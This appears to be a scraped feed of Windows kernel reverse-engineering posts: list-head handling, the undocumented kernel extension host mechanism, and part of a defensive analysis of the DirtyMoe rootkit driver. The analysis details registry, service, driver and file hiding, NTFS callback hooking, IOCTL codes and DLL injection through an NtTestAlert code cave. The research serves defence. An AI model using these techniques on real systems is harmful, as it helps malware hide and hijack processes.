🔒
There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

Adventures in avoiding (list) head

Working with lists is hard. I can never get them right the first time and keep finding myself having to draw them to understand how they work, or forget to advance them in a list and get stuck in a loop. Every single time. Can you believe someone is actually paying me to write code? That runs in the kernel?

Anyway, I worked a lot with lists recently in a few projects that I might publish some day when I find the inner motivation to finish them. And I had the same problem in a few of them — I didn’t start iterating over the list from its head, but from a random item, without knowing there my list head was. And knowing where the list head is can be important.

Take this example — we want to parse the kernel process list and want to get the value of Process->DiskCounters->BytesRead for each process:

This should work fine for any normal process:

But what will happen when we reach the list head?

The list head is not a part of a real EPROCESS structure and it is surrounded by other, unrelated variables. If we try to treat it like a normal EPROCESS we will read these and might try to use them as pointers and dereference them, which will crash sooner or later.

But a useful thing to remember is that there is one significant difference between the list head and the rest of the list — lists connect data structures that are allocated in the pool, while the list head will be a global variable in the driver that manages the list (in our example, ntoskrnl.exe has nt!PsActiveProcessHead as a global variable, used to access the process list).

There is no easy way that I know of to check if an address is in the pool or not, but we can use a trick and call RtlPcToFileHeader. This function receives an address and writes the base address of the image it’s in into an output parameter. So we can do:

We can also verify that the list head is inside the image it’s supposed to be in, by getting the image base address from a known symbol and comparing:

Windows RS3 added the useful RtlPcToFileName function, that makes our code a bit prettier:

Yes, More Callbacks — The Kernel Extension Mechanism

Yes, More Callbacks — The Kernel Extension Mechanism

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Yes, More Callbacks — The Kernel Extension Mechanism was originally published in Yarden_Shafir on Medium, where people are continuing the conversation by highlighting and responding to this story.

DirtyMoe: Rootkit Driver

11 August 2021 at 09:44

Abstract

In the first post DirtyMoe: Introduction and General Overview of Modularized Malware, we have described one of the complex and sophisticated malware called DirtyMoe. The main observed roles of the malware are Cryptojacking and DDoS attacks that are still popular. There is no doubt that malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is using rootkits. In general, the main goal of the rootkits is to hide itself and other modules of the hosted malware on the kernel layer. The rootkits are potent tools but carry a high risk of being detected because the rootkits work in the kernel-mode, and each critical bug leads to BSoD.

The primary aim of this next article is to analyze rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of a DirtyMoe driver, aiming to provide complex information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities on kernel and user mode. Moreover, the driver can execute commands received from the user-mode under the kernel privileges. Another significant aspect of the driver is an injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s functionality that censors the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and which anti-forensic method the malware authors used.

Another essential point of this research is the investigation of the driver’s meta-data, which showed that the driver is code-signed with the certificates that have been stolen and revoked in the past. However, the certificates are widespread in the wild and are misused in other malicious software in the present.

Finally, the last part summarises the rootkit functionally and draws together the key findings of digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a windows driver that DirtyMoe drops on the system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the samples as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries FltMgr and ntosrnl. Table 1 summarizes the most suspicious methods from the driver’s point.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID for the process requested for a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey
ZwSetValueKey
ZwQueryValueKey
ZwOpenKey
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routine via MmGetSystemRoutineAddress() as a form of obfuscation since the string table contains routine names operating with VirtualMemory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel-routine ZwQueryInformationProcess() and strings such as services.exe, winlogon.exe point out that the rootkit probably works with kernel structures of the critical windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needed with high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in the user-mode just sends a defined control code, and data to the driver and it provides higher privilege actions.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is hook method provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after driver loading. The driver initializes a large number of global variables for the proper operation of the driver. Firstly, the driver detects the OS version and setups required offsets for further malicious use. Secondly, the variable for pointing of the driver image is initialized. The driver image is used for hiding a driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no interest action,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows it to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds a specific driver name to the
listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key
using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel
GetCellRoutine().
0x222004 The malware sends a process ID that wants to terminate. The driver calls kernel function
ZwTerminateProcess() and terminates the process and all of its threads regardless of malware privileges.
0x2224C8 The malware sends data which driver writes to the file defined by filePath variable; see Setting control codes
used variable: filePath, fileData
Table 3. Controlling IOCTLs
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names
(full path)
WinDeviceName
WinDeviceNameB
Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names
(containing number)
WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system;
see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system;
see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
(Shutdown)
filename1_for_ShutDown
data1_for_ShutDown
Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown
data2_for_ShutDown
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
(Shutdown)
regKey1_shutdown
regValue1_shutdown
regData1_shutdown
regType1
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown
regValue2_shutdown
regData2_shutdown
regType2
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
regValue
regType
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Unknow
(unused)
dwWinDevicePathA
dwWinDeviceDataA
Keeps a path and data for file A.
dwWinDevicePathB
dwWinDeviceDataB
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
dwWinDriverMaker2_2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1
dwWinDriverMaker1_2
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
dwWinDriverDataA
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2
dwWinDriverDataA_2
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2
dwWinDriverDataB
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2
dwWinDriverDataB_2
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requested process is not present in whitelists. There are two whitelists. The first whitelists (Process ID and File names) cause that the QueryDirectory results are not modified if the process ID or process image file name, requesting the given I/O operation (QueryDirectory), is present in the whitelists. It represents malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. It ensures that the whitelisted files are not visible for non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file for the user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g, Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process ID, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the white list. It is double protection. The blacklist is focused on processing image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds an address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for CM_KEY_CONTROL_BLOCK, and its associated HHIVE structured correspond with the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that offsets of looked structure, variable, or method are specific for each windows version or build. So, the driver must determine on which Windows version the driver runs.

The MalGetCellRoutine() hook method performs 3 basic operations as follow:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across a whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the interaction is at the end of the HIVE, the driver does not return the last key since it was returned before, but it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the request key only for regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Device Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and Create flag. The driver affects only threads in which Create flag is set to TRUE, so only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segments from the address of the ZwAllocateVirtualMemory() and looks up for instructions representing the constant move to eax (e.g. mov eax, ??h). It identifies the VirtualMemory methods; see Table 7 for constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constants is found, the final address of a lookup method is calculated as follow:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find methods can be summarized as follow:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method  is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. The APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. It is called periodically. The driver rewrites the instructions of the NtTestAlert() which jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step to the process injection is to find free memory for a code cave. The driver finds the free memory near the NtTestAlert() routine address. The code cave includes a shellcode as Figure 6. demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code into the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with the instruction which just jumps to the shellcode. It causes that when the NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

